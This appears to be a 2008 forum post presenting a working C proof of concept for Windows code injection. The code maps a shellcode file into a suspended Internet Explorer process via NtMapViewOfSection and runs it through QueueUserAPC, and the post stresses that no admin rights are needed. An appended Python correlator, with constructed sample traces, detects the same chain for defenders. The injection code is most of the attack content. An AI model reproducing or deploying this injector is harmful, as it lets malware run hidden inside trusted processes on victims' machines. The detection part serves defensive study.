New techniques for code injection
2008-03-22 15:45
399 views
I found some new possibilities for executing code in the context of a remote process: using an undocumented function for writing the code to the remote process address space, and a new method for executing it in the context of it. The techniques work completely in userspace and don't need any special requirements like admin rights or something like that. See the source of the PoC, it's pretty self-explanatory. Sorry for my English, I'm from Germany...
```c
#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) (
    HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
    SECTION_INHERIT, ULONG, ULONG
);

func_NtMapViewOfSection NtMapViewOfSection = NULL;

LPVOID NTAPI MyMapViewOfFileEx(
    HANDLE hProcess,
    HANDLE hFileMappingObject,
    DWORD dwDesiredAccess,
    DWORD dwFileOffsetHigh,
    DWORD dwFileOffsetLow,
    DWORD dwNumberOfBytesToMap,
    LPVOID lpBaseAddress
)
{
    NTSTATUS Status;
    LARGE_INTEGER SectionOffset;
    ULONG ViewSize;
    ULONG Protect;
    LPVOID ViewBase;

    // Convert the offset
    SectionOffset.LowPart = dwFileOffsetLow;
    SectionOffset.HighPart = dwFileOffsetHigh;

    // Save the size and base
    ViewBase = lpBaseAddress;
    ViewSize = dwNumberOfBytesToMap;

    // Convert flags to NT Protection Attributes
    if (dwDesiredAccess & FILE_MAP_WRITE) {
        Protect = PAGE_READWRITE;
    } else if (dwDesiredAccess & FILE_MAP_READ) {
        Protect = PAGE_READONLY;
    } else if (dwDesiredAccess & FILE_MAP_COPY) {
        Protect = PAGE_WRITECOPY;
    } else {
        Protect = PAGE_NOACCESS;
    }

    // Map the section
    Status = NtMapViewOfSection(hFileMappingObject, hProcess, &ViewBase, 0, 0,
                                &SectionOffset, &ViewSize, ViewShare, 0, Protect);
    if (!NT_SUCCESS(Status)) {
        // We failed
        return NULL;
    }

    // Return the base
    return ViewBase;
}

int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
    HMODULE hDll = LoadLibrary( "ntdll.dll" );
    NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");

    // Getting a shellcode, use whatever you want
    HANDLE hFile = CreateFile ("C://shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL, NULL);
    HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);

    // Starting target process
    STARTUPINFO st;
    ZeroMemory (&st, sizeof(st));
    st.cb = sizeof (STARTUPINFO);
    PROCESS_INFORMATION pi;
    ZeroMemory (&pi, sizeof(pi));
    CreateProcess ("C://Programme//Internet Explorer//iexplore.exe", NULL, NULL, NULL, FALSE,
                   CREATE_SUSPENDED, NULL, NULL, &st, &pi);

    // Injecting the shellcode into target process address space
    LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);

    // Create a new APC which will be executed at first when the thread resume
    QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
    ResumeThread (pi.hThread);

    CloseHandle (hFile);
    CloseHandle (hMappedFile);
    CloseHandle (pi.hThread);
    CloseHandle (pi.hProcess);
    return 0;
}
```
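From a detection standpoint, the PoC above leaves a distinctive four-step trail: a process created with CREATE_SUSPENDED, a cross-process NtMapViewOfSection into it, a QueueUserAPC whose routine address lies inside that freshly mapped view, and a ResumeThread on the same target. The following correlator is an added example, not part of the original post; the pipe-separated API-trace format and the sample lines are constructed here to stand in for whatever EDR or sandbox telemetry a defender actually has.

```python
"""Correlate API-trace events for the mapped-section + APC injection chain."""
from collections import defaultdict

# Constructed sample trace (not real telemetry). One call per line:
#   caller_pid|api|target_pid|key=value ...
# The first four lines mirror the PoC's sequence; the last two are a benign
# non-suspended launch that must not alert.
SAMPLE_TRACE = """\
1000|CreateProcess|2000|flags=CREATE_SUSPENDED
1000|NtMapViewOfSection|2000|base=0x00400000 size=0x1000 protect=PAGE_READONLY
1000|QueueUserAPC|2000|apc=0x00400000
1000|ResumeThread|2000|
3000|CreateProcess|4000|flags=0
3000|ResumeThread|4000|
"""

def parse_trace(text):
    """Turn the constructed trace format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        caller, api, target, detail = line.split("|", 3)
        fields = dict(kv.split("=", 1) for kv in detail.split() if "=" in kv)
        events.append({"caller": int(caller), "api": api, "target": int(target), **fields})
    return events

def detect_mapped_apc_injection(events):
    """Return (caller_pid, target_pid) pairs that complete the whole chain:
    suspended create -> cross-process map -> APC aimed inside that view -> resume."""
    state = defaultdict(dict)          # per (caller, target) progress
    alerts = []
    for e in events:
        key = (e["caller"], e["target"])
        s = state[key]
        if e["api"] == "CreateProcess" and "CREATE_SUSPENDED" in e.get("flags", ""):
            s["suspended"] = True
        elif e["api"] == "NtMapViewOfSection" and e["caller"] != e["target"]:
            base, size = int(e["base"], 16), int(e["size"], 16)
            s.setdefault("views", []).append((base, base + size))
        elif e["api"] == "QueueUserAPC":
            apc = int(e["apc"], 16)
            # The APC routine pointing into a remotely mapped view is the tell.
            if any(lo <= apc < hi for lo, hi in s.get("views", [])):
                s["apc_in_view"] = True
        elif e["api"] == "ResumeThread" and s.get("suspended") and s.get("apc_in_view"):
            alerts.append(key)
    return alerts
```

Requiring all four steps on the same caller/target pair keeps ordinary suspended launches (debuggers, installers) out of the alert set.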